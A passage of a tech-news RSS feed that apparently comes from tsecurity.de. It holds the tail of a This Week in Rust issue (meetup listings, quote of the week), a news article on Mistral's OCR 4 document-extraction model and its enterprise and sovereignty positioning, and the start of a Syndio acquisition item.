<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>,
<a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a>,
<a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><em>No New or Updated RFCs were created this week.</em></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-06-24 - 2026-07-22 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-06-25 | Virtual (Girona, ES) | <a href="https://lu.ma/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/rust-girona?e=evt-rgneLvX1H85AmjV"><strong>Rust Girona Weekly Session</strong></a></li>
</ul>
</li>
<li>2026-07-01 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210366/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/308455932/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Charlottesville, VA, US) | <a href="https://www.meetup.com/charlottesville-rust-meetup">Charlottesville Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/charlottesville-rust-meetup/events/315211402/"><strong>Learning Game Development the Hard Way with Rust and Bevy</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/313345243/"><strong>Rust Nürnberg online</strong></a></li>
</ul>
</li>
<li>2026-07-04 | Virtual (Kampala, UG) | <a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587">Rust Circle Meetup</a><ul>
<li><a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587"><strong>Rust Circle Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-05 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095287/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-07 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315060981/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-07-14 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254778/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a><ul>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-06-24 | Manchester, UK | <a href="https://www.meetup.com/rust-manchester">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315200163/"><strong>Rust Manchester June Talks</strong></a></li>
</ul>
</li>
<li>2026-06-24 | Trondheim, NO | <a href="https://www.meetup.com/rust-trondheim">Rust Trondheim</a><ul>
<li><a href="https://www.meetup.com/rust-trondheim/events/315298357/"><strong>The Chaos of Time and Time Intervals</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/314396600/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Copenhagen, DK | <a href="https://www.meetup.com/copenhagen-rust-community">Copenhagen Rust Community</a><ul>
<li><a href="https://www.meetup.com/copenhagen-rust-community/events/315214426/"><strong>Rust meetup #69</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Toulouse, FR | <a href="https://www.meetup.com/rust-community-toulouse/">Rust Toulouse</a><ul>
<li><a href="https://www.meetup.com/rust-community-toulouse/events/314947457/"><strong>Rust Toulouse Meetup - Bevy &amp; ESP32</strong></a></li>
</ul>
</li>
<li>2026-06-27 | Stockholm, SE | <a href="https://www.meetup.com/stockholm-rust">Stockholm Rust</a><ul>
<li><a href="https://www.meetup.com/stockholm-rust/events/315371143/"><strong>Ferris' Fika Forum #27</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Edinburgh, UK | <a href="https://www.meetup.com/rust-edi">Rust and Friends</a><ul>
<li><a href="https://www.meetup.com/rust-and-friends/events/314941098/"><strong>Bevy, Bits, &amp; Cats (Rust July Talks)</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Enschede, NL | <a href="https://www.meetup.com/dutch-rust-meetup">Baseflow Tech Meetups</a><ul>
<li><a href="https://www.meetup.com/baseflow-tech-meetups/events/315099547/"><strong>AI Summit</strong></a></li>
</ul>
</li>
<li>2026-07-08 | Dublin, IE | <a href="https://www.meetup.com/rust-dublin">Rust Dublin</a><ul>
<li><a href="https://www.meetup.com/rust-dublin/events/315150327/"><strong>Join us live and INPERSON for Rust 262</strong></a></li>
</ul>
</li>
<li>2026-07-09 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a><ul>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-06-24 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/315105633/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-06-24 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/314386080/"><strong>Rust LA: Rust-Based Constraint Solvers in 2D Sketching with Zoo Technologies</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl">Rust Atlanta</a><ul>
<li><a href="https://www.meetup.com/rust-atl/events/313539326/"><strong>Rust-Atl</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a><ul>
<li><a href="https://www.meetup.com/hackerdojo/events/314825008/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
</ul>
</li>
<li>2026-06-26 | New York, NY, US | <a href="https://www.meetup.com/rust-nyc">Rust NYC</a><ul>
<li><a href="https://www.meetup.com/rust-nyc/events/315014582/"><strong>Rust NYC's Big Summer Social</strong></a></li>
</ul>
</li>
<li>2026-06-27 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225857/"><strong>Somerville Union Square Rust Lunch, June 27</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/315103359/"><strong>Git is easy?</strong></a></li>
</ul>
</li>
<li>2026-07-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225861/"><strong>Boston University Rust Lunch, July 4</strong></a></li>
</ul>
</li>
<li>2026-07-09 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a><ul>
<li><a href="https://www.meetup.com/utah-rust/events/314696647/"><strong>Utah Rust July Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-11 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225865/"><strong>MIT Rust Lunch, July 11</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
</ul>
</li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-06-25 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne">Rust Melbourne</a><ul>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039461/"><strong>Rust Melbourne June 2026</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a><ul>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>I think this is the wrong decision, and I wish the lang team had stabilized the Late type instead.
Better Late than Never.</p>
</blockquote>
<p>– <a href="https://www.reddit.com/r/rust/comments/1u1v53c/the_never_type_is_likely_to_stabilize_soon/oqsxf3v/">/u/CouteauBleu on /r/rust</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1782">Theemathas</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://this-week-in-rust.org/REDDIT_LINK_HERE">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mistral launches OCR 4, turning document extraction into a full enterprise AI play]]></title>
<description><![CDATA[Mistral AI on Tuesday released OCR 4, a document intelligence model that moves beyond raw text extraction to return structured representations of entire documents — complete with bounding boxes, block-type classification, and per-word confidence scores. The release marks Mistral's fourth generati...]]></description>
<link>https://tsecurity.de/de/3622912/it-nachrichten/mistral-launches-ocr-4-turning-document-extraction-into-a-full-enterprise-ai-play/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622912/it-nachrichten/mistral-launches-ocr-4-turning-document-extraction-into-a-full-enterprise-ai-play/</guid>
<pubDate>Wed, 24 Jun 2026 23:48:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://mistral.ai/">Mistral AI</a> on Tuesday released <a href="https://mistral.ai/news/ocr-4/">OCR 4</a>, a document intelligence model that moves beyond raw text extraction to return structured representations of entire documents — complete with bounding boxes, block-type classification, and per-word confidence scores. The release marks Mistral's fourth generation of optical character recognition technology in roughly 15 months and lands at a moment when the company's pitch for European AI sovereignty has never been more commercially relevant.</p><p>The model supports 170 languages across 10 language groups, accepts PDF, DOC, PPT, and OpenDocument formats, and can be deployed as a single container on an organization's own infrastructure — a capability Mistral is positioning directly at enterprises in regulated industries that cannot route sensitive documents through U.S.-jurisdiction cloud APIs.</p><p>"Mistral OCR 4 extracts and structures content from a wide range of documents," the company said in its announcement. "Where previous generations focused on converting a page into clean text and tables, OCR 4 returns a structured representation of the document."</p><p>The model is <a href="https://docs.mistral.ai/resources/cookbooks?useCase=OCR">available immediately</a> through the <a href="https://mistral.ai/pricing/">Mistral API</a>, Document AI in <a href="https://mistral.ai/products/studio/">Mistral Studio</a>, <a href="https://aws.amazon.com/sagemaker/ai/">Amazon SageMaker</a>, and <a href="https://azure.microsoft.com/en-us/products/ai-foundry">Microsoft Foundry</a>, with <a href="https://www.snowflake.com/en/blog/engineering/enterprise-scale-document-ai/">Snowflake Parse Document</a> support coming soon. Pricing starts at $4 per 1,000 pages, dropping to $2 per 1,000 pages through a batch API discount.</p><div></div><h2><b>OCR 4 treats every document as a semantic map, not a wall of text</b></h2><p>The central engineering shift in <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> is structural. Rather than outputting a flat stream of extracted text — the paradigm that has defined OCR for decades — the model returns a layered representation in which every block is localized with a bounding box, classified by type (title, table, equation, signature, and others), and scored for confidence at both the page and word level.</p><p>Mistral says bounding boxes were its most-requested capability. The reason is straightforward: without location data, downstream systems cannot trace an extracted fact back to its source on a specific page. That traceability gap has been a persistent friction point for enterprises building retrieval-augmented generation (RAG) pipelines, compliance workflows, or any application where "where did this number come from?" is a question that needs an auditable answer.</p><p>Block classification addresses a related problem. A paragraph tagged as a "title" can segment a document into hierarchical chunks for semantic search. A block tagged as a "table" can be routed to a structured-data pipeline rather than a text summarizer. A block tagged as a "signature" can trigger a redaction workflow in a compliance system.</p><p>These are not novel ideas in isolation, but packaging them as first-class outputs of the OCR model itself — rather than requiring a separate layout-analysis stage — removes an integration layer that enterprise teams have historically had to build and maintain themselves.</p><p>The confidence scores serve a dual purpose. At scale, they allow organizations to programmatically route low-confidence regions to human reviewers and auto-approve high-confidence extractions, building what the industry calls human-in-the-loop verification without requiring a person to review every page of every document. In production systems, OCR is rarely the end goal — it is the first step in a larger pipeline.</p><p>Developers building RAG systems, agent workflows, or document automation often spend more time reconstructing layout and structure than on the downstream AI logic itself. OCR 4 aims to eliminate that reconstruction step, and if it delivers on that promise, the value accrues not just in OCR cost savings but in reduced engineering hours across the entire document pipeline.</p><h2><b>Independent reviewers preferred Mistral's output 72 percent of the time, but benchmarks tell a complicated story</b></h2><p>Mistral reports that <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> achieved a 72% average win rate in a head-to-head human evaluation against leading competitors, conducted by independent annotators across more than 600 real-world documents in over 12 languages. The model also achieved the top overall score on <a href="https://huggingface.co/datasets/allenai/olmOCR-bench">OlmOCRBench</a> at 85.20 and scored 93.07 on <a href="https://github.com/opendatalab/OmniDocBench">OmniDocBench</a>.</p><p>But the company itself urges caution in interpreting those numbers. In its release, Mistral took the unusual step of auditing and publicly disclosing the specific types of scoring artifacts it encountered, including ground-truth errors in the reference annotations, equivalent LaTeX notation scored as mismatches, column-reading-order assumptions, and header/footer attribution issues. "We therefore treat the aggregate score as directional rather than definitive," the company said — a notably transparent stance from a vendor announcing a product.</p><p>That transparency is well-timed. On the public <a href="https://huggingface.co/datasets/allenai/olmOCR-bench">OlmOCRBench leaderboard</a>, some researchers have noted that OCR 4 currently ranks third, behind open models like Chandra OCR 2. And some open-weight models self-report higher OmniDocBench composite scores — <a href="https://huggingface.co/PaddlePaddle/PaddleOCR-VL-1.6">PaddleOCR-VL-1.6</a> claims 96.33 — though those results have not been independently reproduced on the public leaderboard.</p><p>Early enterprise feedback has been favorable nonetheless. Aidan Donohue, an AI engineer at financial AI firm Rogo, said the company benchmarked OCR 4 against leading agentic document parsers on a chart-dense financial QA dataset and "reached equivalent accuracy at roughly 8x lower cost and 17x lower latency." Ivan Mihailov, an AI engineer at intellectual property management firm Anaqua, said OCR 4 is "roughly 4x faster per page than our incumbent provider." </p><p>Enterprise buyers, however, should run their own evaluations rather than relying on any vendor's benchmark numbers. The practical question is not which model scores highest on a leaderboard, but which model produces the fewest errors on your specific documents, in your specific languages, at a price and latency that fit your workflow.</p><h2><b>The Anthropic export ban gave Mistral's sovereignty pitch the proof point it needed</b></h2><p>Mistral's release lands in a geopolitical context that could hardly be more favorable for its strategic positioning.</p><p>On June 12, <a href="https://www.anthropic.com/news/fable-mythos-access">Anthropic was forced to disable all access to its newest AI models</a>, Fable 5 and Mythos 5, after the U.S. Commerce Department used national security export controls to bar the company from distributing the models to any foreign national. Enterprise clients in finance, healthcare, SaaS, and critical infrastructure found their core intelligence services abruptly disabled, without prior warning or effective recourse. As of June 24, both models remain offline, with <a href="https://kalshi.com/markets/kxfablerestore/fable-restored/kxfablerestore-27">prediction markets giving only 57% odds of restoration</a> before July 1.</p><p>That episode validated a warning Mistral CEO Arthur Mensch has been sounding for over a year. As Business Insider reported, <a href="https://www.businessinsider.com/anthropic-model-access-mistral-opportunity-ai-sovereignty-2026-6">Mensch warned at London Tech Week</a> in June 2025 about American AI companies "having the keys" for their models, calling it a scenario where European companies are "giving leverage to their providers." He added: "At some point, you need to be able to turn it off or turn it on, and you don't want to leave it to another country."</p><p>The argument gained further urgency as Mensch's broader sovereignty pitch escalated in recent months. As reported by CNBC in late May, <a href="https://www.cnbc.com/2026/05/28/mistral-arthur-mensch-design-chips-ai-data-centers.html">Mensch told the outlet</a>: "Europe is lagging behind when it comes to [the] buildout of infrastructure, and so we are investing to close that gap." </p><p>At the same time, <a href="https://www.reuters.com/business/media-telecom/mistral-defends-ai-use-warfare-rebuts-pope-criticism-2026-05-28/">Mensch pushed back against Pope Leo XIV's call for AI to be "disarmed,"</a> arguing that Europe cannot afford to fall behind U.S. tech giants. "We're all for ​peace, but if you look at our rivals and adversaries in the world, they're using artificial ​intelligence … we do need to have our own capabilities," Mensch told reporters.</p><p>OCR 4's single-container, self-hosted deployment model is the product-level expression of that argument. A U.S.-headquartered provider offering EU data residency means documents are stored in Frankfurt but governed by U.S. law. Mistral, incorporated in France and operating under EU jurisdiction, offering on-premise containerized deployment, means documents never leave the customer's infrastructure at all. The <a href="https://artificialintelligenceact.eu/article/99/">EU AI Act's fine enforcement provisions</a> take effect August 2, adding regulatory pressure to the compliance calculus for European enterprises evaluating document AI vendors.</p><h2><b>Baidu's free, open-weight OCR model arrived one day earlier — and the contrast is revealing</b></h2><p>Mistral's release did not arrive in isolation. Just one day before <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> launched, Baidu shipped <a href="https://huggingface.co/baidu/Unlimited-OCR">Unlimited-OCR</a> on June 22 — a 3-billion-parameter MIT-licensed model that tackles one of the most persistent pain points in document AI: parsing entire PDFs and multi-page scans in a single forward pass, without chunking the input or stitching the output back together afterward.</p><p>Baidu's model uses a technique called <a href="https://arxiv.org/html/2606.23050v1">Reference Sliding Window Attention (R-SWA)</a> that, as a top <a href="https://news.ycombinator.com/item?id=48643426">Hacker News commenter explained</a>, splits the AI's focus into two paths: maintaining full attention on the original document image while restricting memory of generated text to a tight, moving window. The result is constant KV cache size and the ability to transcribe 40-plus pages in a single forward pass. The model gathered <a href="https://github.com/baidu/Unlimited-OCR">1,800 GitHub stars</a> in its first 24 hours and racked up more than <a href="https://news.ycombinator.com/item?id=48643426">479 upvotes on Hacker News</a>, where the discussion thread ran to 109 comments.</p><p>The two releases frame what some analysts are calling the June 2026 document-AI split: self-hosted long-horizon parsing with open weights versus structured managed extraction with enterprise features.</p><p><a href="https://github.com/baidu/Unlimited-OCR">Baidu's model</a> is free under an MIT license, runs on standard GPU hardware, and has no managed API or enterprise SLA. <a href="https://mistral.ai/news/ocr-4/">Mistral's model</a> is a commercial product with per-page pricing, bounding boxes, confidence scores, block classification, multi-platform distribution, and self-hosted deployment options for enterprise customers. </p><p><a href="https://huggingface.co/baidu/Unlimited-OCR">Unlimited-OCR</a> may be the better tool for a research team digitizing scanned dissertations on a single GPU. <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> is built for the IT procurement process — the world of SLAs, data processing agreements, and compliance audits.</p><p>Beyond Baidu, the broader OCR competitive field includes <a href="https://cloud.google.com/document-ai">Google Document AI</a>, <a href="https://aws.amazon.com/textract/">Amazon Textract</a>, <a href="https://azure.microsoft.com/en-us/products/ai-foundry/tools/document-intelligence">Azure Document Intelligence</a>, <a href="https://www.abbyy.com/vantage/">ABBYY Vantage</a>, and a growing number of open-weight models. </p><p>On the <a href="https://news.ycombinator.com/item?id=48643426">Hacker News thread</a> for Unlimited-OCR, practitioners offered a candid assessment of the state of the art. Joss82, who has worked on document parsing for 10 years, wrote bluntly: "OCR still sucks in 2026." Meanwhile, one user named SyneRyder reported success with Claude for OCR of hundreds of pages of handwritten documents, noting the model delivered results with "no corrections required" and even pointed out a continuity error in the source text. These practitioner reports underscore a key tension in the market: performance varies wildly depending on the specific document type, language, and quality of the source material.</p><h2><b>The real play is not OCR — it is an enterprise AI stack with document intelligence as the on-ramp</b></h2><p>Step back far enough, and <a href="https://mistral.ai/news/ocr-4/">Mistral's OCR 4 release</a> is not really an OCR story. It is an enterprise go-to-market story built on top of a $4.4 billion global intelligent document processing market that is forecast to grow at a 33.1% compound annual growth rate through 2030, according to <a href="https://www.grandviewresearch.com/industry-analysis/intelligent-document-processing-market-report">Grand View Research</a>.</p><p>For Mistral, OCR is a wedge into enterprise AI budgets. The model feeds directly into Mistral's <a href="https://mistral.ai/news/search-toolkit/">Search Toolkit</a>, the company's open-source composable search framework announced at the AI Now Summit. In that architecture, <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> serves as the ingestion layer for retrieval-augmented generation and enterprise search pipelines, converting raw documents into citation-ready, structurally classified input. The logic is clear: once an enterprise adopts OCR 4 for document extraction, Mistral's broader model suite — including Medium 3.5 for reasoning and the Vibe agentic platform for task execution — becomes the natural next step in the stack. </p><p>That pipeline ambition is critical context for understanding Mistral's current fundraising trajectory. Bloomberg recently reported that the company is in early discussions to <a href="https://www.bloomberg.com/news/articles/2026-06-12/france-s-mistral-in-funding-talks-at-about-20-billion-valuation">raise about €3 billion ($3.5 billion)</a> at a valuation of roughly €20 billion — nearly double the €11.7 billion valuation from its September Series C round. To date, Mistral has raised only about $4 billion, a fraction of what its largest U.S. rivals have taken in. OCR 4 and its associated enterprise revenue pipeline are part of how the company plans to justify that higher valuation, with Mistral targeting <a href="https://www.lemonde.fr/en/economy/article/2026/01/22/french-ai-firm-mistral-predicts-revenue-of-1-billion-in-2026_6749706_19.htm">€1 billion in revenue</a> for 2026, up from €200 million in 2025, according to Le Monde.</p><p>Mistral is a company with roughly 1,000 employees and ambitions to compete with labs that have raised 40 times as much capital. It cannot win a general-purpose model arms race against OpenAI and Anthropic. What it can do is build a differentiated enterprise stack around sovereignty, <a href="https://mistral.ai/news/ocr-4/">structured document intelligence</a>, and agentic workflows — and use that stack to capture European enterprise budgets that are increasingly wary of U.S. provider dependency. </p><p>The pricing structure reinforces that strategy: at $2 per 1,000 pages in batch mode, the cost of processing a 100,000-page corporate archive falls to $200, making large-scale digitization projects economically viable in ways they may not have been with token-based vision-language model pricing.</p><p>Whether Mistral can execute that vision at scale — against Google, Amazon, Microsoft, and a surging open-source ecosystem — remains an open question. But the Anthropic export control crisis is still unresolved, European data sovereignty regulations are tightening, and a potential €20 billion funding round is on the horizon. The company is holding an <a href="https://learn.mistral.ai/public/events/ocr4-webinar">OCR 4 production webinar on July 7 at 6:00 PM CET</a>.</p><p>Two weeks ago, the argument for building AI infrastructure outside the reach of U.S. export controls was theoretical. Then the U.S. government flipped a switch, and Anthropic's most advanced models went dark for every non-American on the planet. Mistral did not cause that crisis — but it spent the last year building the product that makes it matter.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Syndio bets on agentic AI with first acquisition in Seattle pay equity startup’s history]]></title>
<description><![CDATA[Syndio announced Tuesday that it acquired Embrace.ai, an agentic AI startup whose founders and technology will help Syndio build out its AI-powered compensation platform. Read More]]></description>
<link>https://tsecurity.de/de/3622313/it-nachrichten/syndio-bets-on-agentic-ai-with-first-acquisition-in-seattle-pay-equity-startups-history/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622313/it-nachrichten/syndio-bets-on-agentic-ai-with-first-acquisition-in-seattle-pay-equity-startups-history/</guid>
<pubDate>Wed, 24 Jun 2026 19:48:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
